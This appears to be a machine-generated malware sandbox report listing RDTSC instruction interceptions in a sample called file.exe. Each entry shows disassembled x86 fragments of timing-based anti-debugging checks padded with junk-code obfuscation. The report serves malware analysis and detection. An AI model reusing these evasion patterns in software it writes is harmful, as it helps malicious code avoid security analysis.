          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803B65 second address: 803B6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8040A4 second address: 8040BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBA8CCF3D56h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804525 second address: 804530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804530 second address: 804536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804536 second address: 80454E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80454E second address: 80456C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FBA8CCF3D5Ah 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jnl 00007FBA8CCF3D58h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807BC1 second address: 807BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809C91 second address: 809C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FBA8CCF3D56h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809C9B second address: 809CAB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a je 00007FBA8CEE23C6h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F228 second address: 80F234 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA8CCF3D5Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F694 second address: 80F69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBA8CEE23C6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F69E second address: 80F6A8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBA8CCF3D56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F6A8 second address: 80F6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811C74 second address: 811C7A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811C7A second address: 811C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811C84 second address: 811C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811C88 second address: 811C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FBA8CEE23C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811C97 second address: 811CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBA8CCF3D56h 0x0000000a jp 00007FBA8CCF3D56h 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBA8CCF3D60h 0x0000001a jmp 00007FBA8CCF3D5Eh 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8131BB second address: 813220 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA8CEE23C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007FBA8CEE23D5h 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBA8CEE23CAh 0x00000019 pop edx 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f jnp 00007FBA8CEE23C8h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 js 00007FBA8CEE23DCh 0x0000002d jmp 00007FBA8CEE23D6h 0x00000032 popad 0x00000033 mov eax, dword ptr [eax] 0x00000035 push eax 0x00000036 push edx 0x00000037 je 00007FBA8CEE23C8h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8134DC second address: 8134F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FBA8CCF3D56h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8134F3 second address: 8134F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813698 second address: 8136A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jl 00007FBA8CCF3D64h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81438F second address: 8143A7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBA8CEE23C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jnc 00007FBA8CEE23C6h 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push ecx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815079 second address: 81507D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81507D second address: 815098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jmp 00007FBA8CEE23CFh 0x00000010 pop ebx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815098 second address: 81509E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816E3E second address: 816E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23CEh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81509E second address: 8150A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81833A second address: 81833E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81833E second address: 818344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818344 second address: 81834A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819957 second address: 81995C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F644 second address: 81F64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F64A second address: 81F650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F650 second address: 81F65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FBA8CEE23CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F65F second address: 81F666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F666 second address: 81F66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81960D second address: 819617 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA8CCF3D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A12B second address: 81A132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F66C second address: 81F673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819617 second address: 819629 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA8CEE23C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F673 second address: 81F67F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBA8CCF3D5Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819629 second address: 819630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4747 second address: 7D4767 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007FBA8CCF3D56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBA8CCF3D5Fh 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821B8D second address: 821B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821B92 second address: 821B97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821B97 second address: 821BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FBA8CEE23C8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jnl 00007FBA8CEE23E1h 0x0000002a adc di, 30FBh 0x0000002f push 00000000h 0x00000031 mov edi, dword ptr [ebp+13AC1B23h] 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+13AC188Fh], eax 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821BFB second address: 821BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821E30 second address: 821E51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA8CEE23D3h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822F09 second address: 822F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop ecx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 825DDC second address: 825DE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823EB4 second address: 823EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 825DE1 second address: 825DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823EB8 second address: 823EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 825DF0 second address: 825DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 825DF4 second address: 825E00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007FBA8CCF3D56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8263BA second address: 8263C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8263C0 second address: 82642E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+13AC1952h], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FBA8CCF3D58h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d xor di, 69D6h 0x00000032 push 00000000h 0x00000034 jbe 00007FBA8CCF3D6Eh 0x0000003a jmp 00007FBA8CCF3D68h 0x0000003f push eax 0x00000040 jbe 00007FBA8CCF3D6Dh 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FBA8CCF3D5Fh 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8265D6 second address: 8265E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8265E4 second address: 8265EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828587 second address: 82858B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82858B second address: 82859E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnp 00007FBA8CCF3D56h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8295AA second address: 82963B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBA8CEE23D6h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FBA8CEE23C8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov bl, cl 0x0000002c push 00000000h 0x0000002e jmp 00007FBA8CEE23D3h 0x00000033 mov edi, 0A56F440h 0x00000038 push 00000000h 0x0000003a call 00007FBA8CEE23D7h 0x0000003f add ebx, 3660762Fh 0x00000045 pop edi 0x00000046 push eax 0x00000047 push edi 0x00000048 push eax 0x00000049 push edx 0x0000004a jnl 00007FBA8CEE23C6h 0x00000050 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E61D second address: 82E621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E621 second address: 82E627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A798 second address: 82A7A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CCF3D5Ah 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E627 second address: 82E62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A7A6 second address: 82A855 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA8CCF3D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FBA8CCF3D58h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FBA8CCF3D58h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 push eax 0x00000049 sub edi, dword ptr [ebp+13AC26D5h] 0x0000004f pop ebx 0x00000050 mov dword ptr fs:[00000000h], esp 0x00000057 mov ebx, dword ptr [ebp+13AC3583h] 0x0000005d mov eax, dword ptr [ebp+13AC00BDh] 0x00000063 stc 0x00000064 push FFFFFFFFh 0x00000066 jc 00007FBA8CCF3D6Fh 0x0000006c nop 0x0000006d push ecx 0x0000006e jmp 00007FBA8CCF3D63h 0x00000073 pop ecx 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 je 00007FBA8CCF3D56h 0x0000007f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E62D second address: 82E631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A855 second address: 82A85B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F47C second address: 82F480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F480 second address: 82F486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F486 second address: 82F4B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FBA8CEE23D5h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F4B1 second address: 82F4B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F4B7 second address: 82F4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830629 second address: 830636 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA8CCF3D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838264 second address: 838279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBA8CEE23CEh 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8383F3 second address: 8383F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8383F7 second address: 838426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBA8CEE23D7h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FBA8CEE23CBh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838426 second address: 83842C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84055C second address: 840562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840562 second address: 84059B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jl 00007FBA8CCF3D5Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007FBA8CCF3D5Ch 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84059B second address: 8405AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840730 second address: 840738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840738 second address: 84074C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c jne 00007FBA8CEE23C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84074C second address: 840759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FBA8CCF3D5Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845983 second address: 845989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844E7A second address: 844E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
